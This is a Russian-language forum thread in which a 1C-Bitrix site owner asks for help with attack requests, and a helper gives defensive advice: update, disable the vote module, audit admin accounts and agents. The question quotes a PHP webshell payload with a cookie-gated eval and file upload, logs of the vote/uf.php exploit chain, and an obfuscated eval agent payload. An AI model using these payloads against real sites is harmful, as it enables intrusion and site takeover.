Уязвимость или троян? POST запрос с параметрам "bitrixxx"

@joub · Регистрация: 08.01.2013

Студворк — интернет-сервис помощи студентам

Всем доброго дня!
Подскажите такую штуку...

Где-то числа с 24 февраля на сайт начали поступать таки вот POST запросы:

Code
1
2
[bitrixxx] => file_put_contents($_SERVER['DOCUMENT_ROOT'].'/bitrix/admin/df18c523cd61.php','<?=409723*20;if(md5($_COOKIE[d])=="17028f487cb2a84607646da3ad3
878ec"){echo"ok";eval(base64_decode($_REQUEST[id]));if($_POST["up"]=="up"){@copy($_FILES["file"]["tmp_name"],$_FILES["file"]["name"]);}}?>');

Поле и значение, после чего в указанной деректории появляется файл df18c523cd61.php с содержимым как в запросе...

А так-же, в 23.00 поступил запрос, после чего в Агентах создалась задача, с крайне странным содержимым:

Code
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
85.106.94.82 - - [25/Feb/2023:19:30:29 +0300] "GET / HTTP/1.0" 200 16737 "-" "Mozilla/5.0 (X11; Linux i686 on x86_64; rv:47.0) Gecko/20100101 Firefox/47.0"  
185.106.94.82 - - [25/Feb/2023:19:30:30 +0300] "POST / HTTP/1.0" 200 16663 "https://site.by/" "Mozilla/5.0 (X11; Linux i686 on x86_64; rv:47.0) Gecko/20100101 
Firefox/47.0"                                                                                                                                                 
185.106.94.82 - - [25/Feb/2023:19:30:31 +0300] "GET /bitrix/admin/df18c523cd61.php HTTP/1.0" 200 5270 "https://site.by/" "Mozilla/5.0 (X11; Linux i686 on x86_6
4; rv:47.0) Gecko/20100101 Firefox/47.0"                                                                                                                      
185.106.94.82 - - [25/Feb/2023:23:00:21 +0300] "GET /bitrix/tools/composite_data.php HTTP/1.0" 200 811 "-" "Mozilla/5.0 (Windows NT 6.3) AppleWebKit/537.36 (K
HTML, like Gecko) Chrome/52.0.2757.6 Safari/537.36"                                                                                                           
185.106.94.82 - - [25/Feb/2023:23:00:22 +0300] "POST /bitrix/tools/vote/uf.php?attachId[ENTITY_TYPE]=CFileUploader&attachId[ENTITY_ID][events][onFileIsStarted
][]=CAllAgent&attachId[ENTITY_ID][events][onFileIsStarted][]=Update&attachId[MODULE_ID]=vote&action=vote HTTP/1.0" 200 4329 "https://site.by/bitrix/tools/compo
site_data.php" "Mozilla/5.0 (Windows NT 6.3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2757.6 Safari/537.36"                                         
185.106.94.82 - - [25/Feb/2023:23:12:08 +0300] "GET / HTTP/1.0" 200 16737 "-" "Mozilla/5.0 (X11; Ubuntu; Linux i686) AppleWebKit/537.36 (KHTML, like Gecko) Ch
rome/49.0.2648.43 Safari/537.36"                                                                                                                              
185.106.94.82 - - [25/Feb/2023:23:12:08 +0300] "POST / HTTP/1.0" 200 16663 "https://site.by/" "Mozilla/5.0 (X11; Ubuntu; Linux i686) AppleWebKit/537.36 (KHTML,
 like Gecko) Chrome/49.0.2648.43 Safari/537.36"                                                                                                               
185.106.94.82 - - [25/Feb/2023:23:12:10 +0300] "GET /bitrix/admin/df18c523cd61.php HTTP/1.0" 200 174 "https://site.by/" "Mozilla/5.0 (X11; Ubuntu; Linux i686) 
AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2648.43 Safari/537.36"                                                                                     
185.106.94.82 - - [25/Feb/2023:23:32:27 +0300] "GET / HTTP/1.0" 200 16737 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_12_0) AppleWebKit/537.36 (KHTML, like
 Gecko) Chrome/54.0.2849.15 Safari/537.36"                                                                                                                    
185.106.94.82 - - [26/Feb/2023:05:23:22 +0300] "GET / HTTP/1.0" 200 16737 "-" "Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:47.0) Gecko/20100101 Firefox/47.0" 
185.106.94.82 - - [26/Feb/2023:05:23:32 +0300] "POST / HTTP/1.0" 500 186 "https://site.by/" "Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:47.0) Gecko/20100101 F
irefox/47.0"                                                                                                                                                  
185.106.94.82 - - [26/Feb/2023:05:23:33 +0300] "GET /bitrix/admin/df18c523cd61.php HTTP/1.0" 200 5272 "https://site.by/" "Mozilla/5.0 (Windows NT 6.1; Win64; x
64; rv:47.0) Gecko/20100101 Firefox/47.0"                                                                                                                     
185.106.94.82 - - [26/Feb/2023:07:37:23 +0300] "GET / HTTP/1.0" 200 16737 "-" "Mozilla/5.0 (X11; Ubuntu; Linux i686 on x86_64) AppleWebKit/537.36 (KHTML, like
 Gecko) Chrome/53.0.2835.28 Safari/537.36"                                                                                                                    
185.106.94.82 - - [26/Feb/2023:07:37:23 +0300] "POST / HTTP/1.0" 500 186 "https://site.by/" "Mozilla/5.0 (X11; Ubuntu; Linux i686 on x86_64) AppleWebKit/537.36
 (KHTML, like Gecko) Chrome/53.0.2835.28 Safari/537.36"                                                                                                       
185.106.94.82 - - [26/Feb/2023:07:37:24 +0300] "GET /bitrix/admin/df18c523cd61.php HTTP/1.0" 200 5274 "https://site.by/" "Mozilla/5.0 (X11; Ubuntu; Linux i686 
on x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/53.0.2835.28 Safari/537.36"

Code
1
$arAgent["NAME"];//_(9.)H'5t}>qo7ouj7<(>!)U}3/]6u8u}Q%' //>w7u5ST<"IA.xY:8eeval     /*9!._IkZ)1 DcpyxJA\"F/C1ra/9+E/&^15>Z"yd3y)vk$p6FN*/(/*]~P@.iKSyR3+hRfkLK~GUv3ZgJ!6dmtClEc{/*/urldecode#Dcc5L6|8cI8+~/?Y(/*I$s6IW3YhccLGyx^v2BAJN@ZnzRYVa+*/strrev/*8/WKh@/MlVGf6?yY`E)" w}SRU5]V{]n+5:tVJCC"j+8+%rlK{n*/(/* GC5%z1bi=x%3OOVsQB~jM%]:PZ*|Ox|v<3|8D`"bY(u*/'b3%56%57%27%47%02%e6%27%57%47%56%27%02%02%02%02%02%02%02%02%a0%d7%02%02%02%02%a0%b3%92%27%42%82%c6%16%67%56%02%02%02%02%a0%56%37%c6%56%02%02%02%02%a0%d7%02%02%02%02%a0%b3%27%42%02%d3%02%47%c6%57%37%56%27%f5%c6%16%67%56%42%02%02%02%02%a0%b3%92%22%13%02%d3%02%44%94%02%54%25%54%84%75%02%72%e4%72%02%d3%02%44%f4%94%25%54%05%f5%35%94%02%c2%03%63%02%d3%02%c4%14%65%25%54%45%e4%94%f5%45%e4%54%74%14%02%45%54%35%02%47%e6%56%76%16%f5%26%02%54%45%14%44%05%55%22%82%97%27%56%57%15%e3%d2%24%44%42%02%02%02%02%a0%b7%92%92%d5%22%87%87%87%56%27%f6%47%37%56%27%22%b5%45%35%54%55%15%54%25%f5%42%82%47%56%37%37%96%82%66%96%02%02%02%02%a0%b3%72%b3%92%82%16%47%16%44%47%96%d6%26%57%37%a3%a3%56%c6%26%16%45%16%47%16%44%27%56%47%e6%57%f6%34%c5%c5%37%36%96%47%97%c6%16%e6%14%c5%c5%e6%96%16%d4%c5%c5%87%96%27%47%96%24%c5%c5%72%02%d3%02%27%42%02%02%02%02%a0%b7%56%37%c6%56%02%02%02%02%a0%d7%02%02%02%02%a0%d7%02%02%02%02%a0%b3%47%96%87%56%02%02%02%02%a0%b7%92%56%42%02%e6%f6%96%47%07%56%36%87%54%82%02%86%36%47%16%36%02%02%02%02%a0%d7%02%02%02%02%a0%b3%92%92%92%d5%22%87%87%87%96%27%47%96%26%22%b5%45%35%54%55%15%54%25%f5%42%82%56%46%f6%36%56%46%c6%27%57%82%56%46%f6%36%56%46%c6%27%57%82%c6%16%67%56%02%d3%02%56%42%02%02%02%02%a0%b7%97%27%47%02%02%02%02%a0%a0%b3%92%22%13%02%d3%02%44%94%02%54%25%54%84%75%02%72%e4%72%02%d3%02%74%e4%94%e4%e4%55%25%02%c2%03%02%d3%02%45%e4%55%f4%34%f5%95%25%45%54%25%02%c2%c4%c4%55%e4%02%d3%02%b4%34%54%84%34%f5%54%45%14%44%02%45%54%35%02%47%e6%56%76%16%f5%26%02%54%45%14%44%05%55%22%82%97%27%56%57%15%e3%d2%24%44%42%02%02%02%02%a0%b7%92%92%d5%22%87%87%87%96%27%47%96%26%22%b5%45%35%54%55%15%54%25%f5%42%82%47%56%37%37%96%82%66%96%02%02%02%02%a0%02%02%02%02%02%02%02%02%a0%'/*}+o|u>#TYS0cP_\NWyaT2'55io>_yv*/)        #T/N82kY'xApsEIx`?}`2_DB3;dm)   /*pqPWM{~IE(WOT)l=?x[>zBI# yCBI#B:usrCorl6zEeOOSmoMJ.*/)/*LlRo0|sR8iF+.7}{MxB4Iqg8a5bp^OJ+=|z*/;/*"3YH?h_>d.8'Cay+z\A]M!.x,Lu({qx}&SFE<'c!6|)Y^*/

Там где POST / HTTP/1.0" 500... не обращайте внимания, это уже мои костыли блокирующие такие запросы.

Что это за уязвимость, и решит ли проблему обновление до последней версии Битрикс ?

Версия 1С-Битрикс: Управление сайтом 21.900.0.

@voral · 26.02.2023, 13:16

Скорее всего да, даже рассылка был об этом в прошлом году. Обновляйтесь или пока отключайте модуль vote (а если не используете то отключайте на совсем)

я сам не сталкивался (у меня все проекты на актуальных версиях), но была тогда и волна. Как отключите, обновитесь - проверяйте пользователей с админскими правами - нет ли лишних, нет ли лишних подозрительных агентов,

Проверяйте Настройки - Инструменты - Монитор качества - Тестировать проект. Там есть один из тестов: редактировалось ли ядро. Оно иногда ложно срабатывает, но если покажет файлы - проверьте нет ли "странного".

Пройдитесь сканером: Настройки - Проактивная защита - Сканер безопасности

PS Любую CMS лучше бдить за актуальностью, и отключать модули, которые не используются

@joub · 26.02.2023, 13:24 **[ТС]**

Сообщение от voral

модуль vote

Хм... Написано что это опросы/голосования, но честно говоря такого у себя в проекте не встречал...
Хотя где вообще можно посмотреть - используется тот или иной модуль ?

Да, а POST запросы с полем [bitrixxx] тоже к нему относятся ?

@voral · 26.02.2023, 13:28

Используется или нет - смотреть сложно. Могут быть совершенно разные варианты использования. Если не знаете - вряд ли это основной ваш функционал. А значит отключите его(только таблицы не удаляйте - там спросит). полагаю безопасность важнее. А дальше пройдитесь по сайту и по всему главному функционалу - если ни чего не отвалилось - то и фиг с ним

Если разработчики были правильные на проекте и он все же использовался - они сделали чтобы ни чего не отвалилось лишнего при отключении модуля.

@joub · 26.02.2023, 13:36 **[ТС]**

Сообщение от voral

Если разработчики были правильные

Надеюсь...

Попробую завтра обновится, и еще раз пройти тест на изменения ядра... т.к. показало что как минимум 3 модуля изменено... жаль что не показывает какие именно изменения там сделаны...

Новые блоги и статьи Все статьи Все блоги /
Access VikBal 11.12.2025 Помогите пожалуйста !! Как объединить 2 одинаковые БД Access с разными данными.	Новый ноутбук volvo 07.12.2025 Всем привет. По скидке в "черную пятницу" взял себе новый ноутбук Lenovo ThinkBook 16 G7 на Амазоне: Ryzen 5 7533HS 64 Gb DDR5 1Tb NVMe 16" Full HD Display Win11 Pro	Музыка, написанная Искусственным Интеллектом volvo 04.12.2025 Всем привет. Некоторое время назад меня заинтересовало, что уже умеет ИИ в плане написания музыки для песен, и, собственно, исполнения этих самых песен. Стихов у нас много, уже вышли 4 книги, еще 3. . .	От async/await к виртуальным потокам в Python IndentationError 23.11.2025 Армин Ронахер поставил под сомнение async/ await. Создатель Flask заявляет: цветные функции - провал, виртуальные потоки - решение. Не threading-динозавры, а новое поколение лёгких потоков. Откат?. . .	Поиск "дружественных имён" СОМ портов Argus19 22.11.2025 Поиск "дружественных имён" СОМ портов На странице: https:/ / norseev. ru/ 2018/ 01/ 04/ comportlist_windows/ нашёл схожую тему. Там приведён код на С++, который показывает только имена СОМ портов, типа,. . .
Сколько Государство потратило денег на меня, обеспечивая инсулином. Programma_Boinc 20.11.2025 Сколько Государство потратило денег на меня, обеспечивая инсулином. Вот решила сделать интересный приблизительный подсчет, сколько государство потратило на меня денег на покупку инсулинов. . . .	Ломающие изменения в C#.NStar Alpha Etyuhibosecyu 20.11.2025 Уже можно не только тестировать, но и пользоваться C#. NStar - писать оконные приложения, содержащие надписи, кнопки, текстовые поля и даже изображения, например, моя игра "Три в ряд" написана на этом. . .	Мысли в слух kumehtar 18.11.2025 Кстати, совсем недавно имел разговор на тему медитаций с людьми. И обнаружил, что они вообще не понимают что такое медитация и зачем она нужна. Самые базовые вещи. Для них это - когда просто люди. . .	Создание Single Page Application на фреймах krapotkin 16.11.2025 Статья исключительно для начинающих. Подходы оригинальностью не блещут. В век Веб все очень привыкли к дизайну Single-Page-Application . Быстренько разберем подход "на фреймах". Мы делаем одну. . .	Фото: Daniel Greenwood kumehtar 13.11.2025

@voral 3012 / 1446 / 262 Регистрация: 16.03.2008 Сообщений: 6,444 Записей в блоге: 2
	26.02.2023, 13:16
	Скорее всего да, даже рассылка был об этом в прошлом году. Обновляйтесь или пока отключайте модуль vote (а если не используете то отключайте на совсем) я сам не сталкивался (у меня все проекты на актуальных версиях), но была тогда и волна. Как отключите, обновитесь - проверяйте пользователей с админскими правами - нет ли лишних, нет ли лишних подозрительных агентов, Проверяйте Настройки - Инструменты - Монитор качества - Тестировать проект. Там есть один из тестов: редактировалось ли ядро. Оно иногда ложно срабатывает, но если покажет файлы - проверьте нет ли "странного". Пройдитесь сканером: Настройки - Проактивная защита - Сканер безопасности PS Любую CMS лучше бдить за актуальностью, и отключать модули, которые не используются 0

@voral 3012 / 1446 / 262 Регистрация: 16.03.2008 Сообщений: 6,444 Записей в блоге: 2
	26.02.2023, 13:28
	Используется или нет - смотреть сложно. Могут быть совершенно разные варианты использования. Если не знаете - вряд ли это основной ваш функционал. А значит отключите его(только таблицы не удаляйте - там спросит). полагаю безопасность важнее. А дальше пройдитесь по сайту и по всему главному функционалу - если ни чего не отвалилось - то и фиг с ним Если разработчики были правильные на проекте и он все же использовался - они сделали чтобы ни чего не отвалилось лишнего при отключении модуля. 0